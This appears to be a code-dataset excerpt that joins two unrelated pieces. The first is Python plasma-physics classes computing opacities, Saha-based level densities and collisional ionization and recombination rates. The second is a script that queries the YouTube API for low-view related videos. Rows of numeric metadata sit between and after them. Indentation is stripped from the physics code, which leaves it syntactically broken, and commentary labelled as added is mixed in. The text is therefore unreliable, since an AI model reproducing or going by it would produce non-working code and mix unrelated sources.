class ContinuumOpacityCalculator(ProcessingPlasmaProperty):
outputs = ("chi_continuum_calculator",)
def calculate(self, chi_ff_calculator, chi_bf_interpolator):
@njit(error_model="numpy", fastmath=True)
def chi_continuum_calculator(nu, shell):
(
chi_bf_tot,
chi_bf_contributions,
current_continua,
x_sect_bfs,
) = chi_bf_interpolator(nu, shell)
chi_ff = chi_ff_calculator(nu, shell)
return (
chi_bf_tot,
chi_bf_contributions,
current_continua,
x_sect_bfs,
chi_ff,
)
return chi_continuum_calculator
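# Usage sketch (illustrative only; the frequency and shell values below are
# made up):
#   chi_bf_tot, chi_bf_contrib, continua, x_sects, chi_ff = (
#       chi_continuum_calculator(1.0e15, 0)
#   )
# The tuple mirrors the return values of chi_bf_interpolator with the
# free-free opacity appended.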
class LevelNumberDensityLTE(ProcessingPlasmaProperty):
"""
Attributes
----------
    lte_level_number_density : pandas.DataFrame, dtype float
        LTE level number densities obtained from the Saha factor ``phi_ik``,
        the electron densities and the ion number densities.
    """
outputs = ("lte_level_number_density",)
latex_name = (r"n_{\textrm{i}}^*",)
# TODO: only do this for continuum species
def calculate(self, electron_densities, phi_ik, ion_number_density):
next_higher_ion_index = get_ion_multi_index(
phi_ik.index, next_higher=True
)
# TODO: Check that n_k is correct (and not n_k*)
lte_level_number_density = (
phi_ik * ion_number_density.loc[next_higher_ion_index].values
).multiply(electron_densities, axis=1)
return lte_level_number_density
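# Sketch of the underlying relation (added comment, not original code): this
# is the Saha-Boltzmann relation written per level,
#   n_i* = phi_ik * n_k * n_e,
# where phi_ik is the Saha factor of level i with respect to the next-higher
# ion, n_k the number density of that ion and n_e the electron density.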
class PhotoIonBoltzmannFactor(ProcessingPlasmaProperty):
"""
Attributes
----------
    boltzmann_factor_photo_ion : numpy.ndarray, dtype float
        Boltzmann factor exp(-h nu / (k_B T_e)) evaluated at the
        photoionization cross-section frequencies.
    """
outputs = ("boltzmann_factor_photo_ion",)
def calculate(self, photo_ion_cross_sections, t_electrons):
nu = photo_ion_cross_sections["nu"].values
boltzmann_factor = np.exp(-nu[np.newaxis].T / t_electrons * (H / K_B))
return boltzmann_factor
class CollIonRateCoeffSeaton(ProcessingPlasmaProperty):
"""
Attributes
----------
coll_ion_coeff : pandas.DataFrame, dtype float
The rate coefficient for collisional ionization in the Seaton
approximation. Multiply with the electron density and the
level number density to obtain the total rate.
Notes
-----
The rate coefficient for collisional ionization in the Seaton approximation
is calculated according to Eq. 9.60 in [1].
References
----------
.. [1] Hubeny, I. and Mihalas, D., "Theory of Stellar Atmospheres". 2014.
"""
outputs = ("coll_ion_coeff",)
latex_name = (r"c_{\textrm{i,}\kappa}",)
def calculate(self, photo_ion_cross_sections, t_electrons):
photo_ion_cross_sections_threshold = photo_ion_cross_sections.groupby(
level=[0, 1, 2]
).first()
nu_i = photo_ion_cross_sections_threshold["nu"]
factor = self._calculate_factor(nu_i, t_electrons)
coll_ion_coeff = 1.55e13 * photo_ion_cross_sections_threshold["x_sect"]
coll_ion_coeff = factor.multiply(coll_ion_coeff, axis=0)
coll_ion_coeff = coll_ion_coeff.divide(np.sqrt(t_electrons), axis=1)
ion_number = coll_ion_coeff.index.get_level_values("ion_number").values
coll_ion_coeff[ion_number == 0] *= 0.1
coll_ion_coeff[ion_number == 1] *= 0.2
coll_ion_coeff[ion_number >= 2] *= 0.3
return coll_ion_coeff
def _calculate_factor(self, nu_i, t_electrons):
u0s = self._calculate_u0s(nu_i.values, t_electrons)
factor = np.exp(-u0s) / u0s
factor = pd.DataFrame(factor, index=nu_i.index)
return factor
@staticmethod
def _calculate_u0s(nu, t_electrons):
u0s = nu[np.newaxis].T / t_electrons * (H / K_B)
return u0s
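# Sketch of the underlying relation (added comment, not original code): the
# Seaton approximation implemented above corresponds to
#   c_{i,kappa} = 1.55e13 * g_i * sigma_th / sqrt(T_e) * exp(-u0) / u0,
# with u0 = h nu_i / (k_B T_e), sigma_th the threshold photoionization cross
# section, and g_i = 0.1, 0.2 or 0.3 for ion charges 0, 1 and >= 2.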
class CollRecombRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
coll_recomb_coeff : pandas.DataFrame, dtype float
The rate coefficient for collisional recombination.
Multiply with the electron density squared and the ion number density
to obtain the total rate.
Notes
-----
The collisional recombination rate coefficient is calculated from the
collisional ionization rate coefficient based on the requirement of detailed
balance.
"""
outputs = ("coll_recomb_coeff",)
latex_name = (r"c_{\kappa\textrm{i,}}",)
def calculate(self, phi_ik, coll_ion_coeff):
return coll_ion_coeff.multiply(phi_ik.loc[coll_ion_coeff.index])
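# Note (added for clarity): detailed balance requires that, in LTE,
# collisional recombination exactly reverses collisional ionization; this is
# what multiplying the ionization coefficient by the Saha factor phi_ik
# achieves above.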
class RawCollIonTransProbs(TransitionProbabilitiesProperty, IndexSetterMixin):
"""
Attributes
----------
p_coll_ion : pandas.DataFrame, dtype float
The unnormalized transition probabilities for
collisional ionization.
p_coll_recomb : pandas.DataFrame, dtype float
The unnormalized transition probabilities for
collisional recombination.
cool_rate_coll_ion : pandas.DataFrame, dtype float
The collisional ionization cooling rates of the electron gas.
"""
outputs = ("p_coll_ion", "p_coll_recomb", "cool_rate_coll_ion")
transition_probabilities_outputs = (
"p_coll_ion",
"p_coll_recomb",
"cool_rate_coll_ion",
)
latex_name = (
r"p^{\textrm{coll ion}}",
r"p^{\textrm{coll recomb}}",
r"C^{\textrm{ion}}",
)
def calculate(
self,
coll_ion_coeff,
coll_recomb_coeff,
nu_i,
photo_ion_idx,
electron_densities,
energy_i,
level_number_density,
):
p_coll_ion = coll_ion_coeff.multiply(energy_i, axis=0)
p_coll_ion = p_coll_ion.multiply(electron_densities, axis=1)
p_coll_ion = self.set_index(p_coll_ion, photo_ion_idx, reverse=False)
coll_recomb_rate = coll_recomb_coeff.multiply(
electron_densities, axis=1
) # The full rate is obtained from this by multiplying by the
# electron density and ion number density.
p_recomb_deactivation = coll_recomb_rate.multiply(nu_i, axis=0) * H
p_recomb_deactivation = self.set_index(
p_recomb_deactivation, photo_ion_idx, transition_type=-1
)
p_recomb_deactivation = p_recomb_deactivation.groupby(level=[0]).sum()
index_dd = pd.MultiIndex.from_product(
[p_recomb_deactivation.index.values, ["k"], [0]],
names=list(photo_ion_idx.columns) + ["transition_type"],
)
p_recomb_deactivation = p_recomb_deactivation.set_index(index_dd)
p_recomb_internal = coll_recomb_rate.multiply(energy_i, axis=0)
p_recomb_internal = self.set_index(
p_recomb_internal, photo_ion_idx, transition_type=0
)
p_coll_recomb = pd.concat([p_recomb_deactivation, p_recomb_internal])
cool_rate_coll_ion = (coll_ion_coeff * electron_densities).multiply(
nu_i * H, axis=0
)
level_lower_index = coll_ion_coeff.index
cool_rate_coll_ion = (
cool_rate_coll_ion
* level_number_density.loc[level_lower_index].values
)
cool_rate_coll_ion = self.set_index(
cool_rate_coll_ion, photo_ion_idx, reverse=False
)
cool_rate_coll_ion = cool_rate_coll_ion.groupby(
level="destination_level_idx"
).sum()
ion_cool_index = pd.MultiIndex.from_product(
[["k"], cool_rate_coll_ion.index.values, [0]],
names=list(photo_ion_idx.columns) + ["transition_type"],
)
cool_rate_coll_ion = cool_rate_coll_ion.set_index(ion_cool_index)
return p_coll_ion, p_coll_recomb, cool_rate_coll_ion
| 33.155755 | 127 | 0.642749 | 39,129 | 0.813341 | 0 | 0 | 11,543 | 0.239934 | 0 | 0 | 17,145 | 0.356378 |
b727e8a96c1fbd46e661c2a5b89a290d333e2329 | 1,805 | py | Python | pull_related_videos.py | jgawrilo/youtube | 553bfe4cf303bc06abf8173f5ed0f4deb3ede57f | ["Apache-2.0"] | 1 | 2017-01-13T12:57:06.000Z | 2017-01-13T12:57:06.000Z | pull_related_videos.py | jgawrilo/youtube | 553bfe4cf303bc06abf8173f5ed0f4deb3ede57f | ["Apache-2.0"] | null | null | null | pull_related_videos.py | jgawrilo/youtube | 553bfe4cf303bc06abf8173f5ed0f4deb3ede57f | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
from apiclient.discovery import build
from apiclient.errors import HttpError
from oauth2client.tools import argparser
import json
import os
import codecs
from bs4 import BeautifulSoup
import argparse
import requests
import sys
import googleapiclient
def get_video_info(vid, youtube):
response = youtube.videos().list(
part="id,snippet,contentDetails,statistics",
id=vid,
maxResults=1
).execute()
return response
def get_video_suggestions(youtube, vid):
    """Print the ids of videos related to `vid` that have fewer than 100,000 views."""
    try:
        search_response = youtube.search().list(
            type="video",
            part="id",
            relatedToVideoId=vid,
            maxResults=20
        ).execute()
        for i in search_response["items"]:
            related_id = i["id"]["videoId"]
            view_count = float(
                get_video_info(related_id, youtube)["items"][0]["statistics"]["viewCount"]
            )
            if view_count < 100000:
                print(related_id)
    except googleapiclient.errors.HttpError:
        # Some related videos cannot be queried (e.g. removed or restricted).
        pass
# MAIN
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Pull some youtube.')
parser.add_argument("--key", help="https://cloud.google.com/console")
args = parser.parse_args()
# Set DEVELOPER_KEY to the API key value from the APIs & auth > Registered apps
# tab of
# https://cloud.google.com/console
# Please ensure that you have enabled the YouTube Data API for your project.
DEVELOPER_KEY = args.key
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
developerKey=DEVELOPER_KEY)
for f in os.listdir("../flashpoint/videos/"):
get_video_suggestions(youtube,f)
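    # Usage sketch (assumption about the original project layout):
    #   python pull_related_videos.py --key YOUR_API_KEY
    # where ../flashpoint/videos/ is expected to contain one entry per seed
    # video id; each printed line is a related video with < 100,000 views.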
| 28.203125 | 113 | 0.67867 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 565 | 0.313019 |